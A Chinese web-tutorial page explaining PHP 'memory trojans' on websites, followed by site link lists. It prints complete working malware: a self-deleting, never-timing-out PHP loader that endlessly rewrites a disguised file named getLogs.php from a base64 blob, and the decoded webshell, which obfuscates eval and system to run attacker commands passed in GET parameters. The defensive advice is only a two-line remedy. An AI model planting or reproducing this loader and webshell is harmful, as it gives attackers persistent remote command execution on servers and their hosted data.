php网站为什么那么容易中内存木马病毒?内存木马是怎么入侵你的网站的,下面web建站小编给大家详细讲解一下!
什么是内存木马
内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。
木马是怎么攻击服务器的
//病毒源代码 <?php //设置脚本不超时 set_time_limit(0);ignore_user_abort(true); //删除文件本体 @unlink(__FILE__); //给木马病毒起一个迷惑性的名字 $file = './getLogs.php'; //死循环常驻内存。释放木马文件 while(true) { if(! file_exists($file)) @file_put_contents($file, base64_decode('PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=')); sleep(60); }
释放病毒本体
<?php //以下代码实现了eval关键字和system函数的伪装 //eval($_GET['e']); if($e = @$_GET['e']) { $func = @create_function(null, base64_decode('ZXZhbCgi') . $e . base64_decode('Iik7')); $func(); } //system($_GET['s']); if($s = @$_GET['s']) { $f = str_replace('x', '', 'xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx'); $f($s); }
解决方案:
干掉进程后,删除释放的木马文件。
可以选择正规服务器商,宝塔也有定期杀毒功能!
上面是“php网站为什么那么容易中内存木马病毒(木马病毒原理分析)”的全面内容,想了解更多关于 php入门 内容,请继续关注web建站教程。
当前网址:https://ipkd.cn/webs_2476.html
workflows工作流
- 乡村枯树黄花comfyui工作流
- 一只巨大的古代乌龟后面建有一座城市的超现实场景
- 一群邪恶的小黄人ComfyUI工作流
- 一只蚊子被嵌在琥珀中ComfyUI工作流
- 外星人ComfyUI工作流
- 一个港口配备了小型船只、起重机、集装箱和码头
- 一个精致透明的朱红色水晶凤凰
- 一只可爱的小鸟在飞翔ComfyUI工作流
猜你喜欢
声明:本站提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请发送到邮箱:admin@ipkd.cn,我们会在看到邮件的第一时间内为您处理!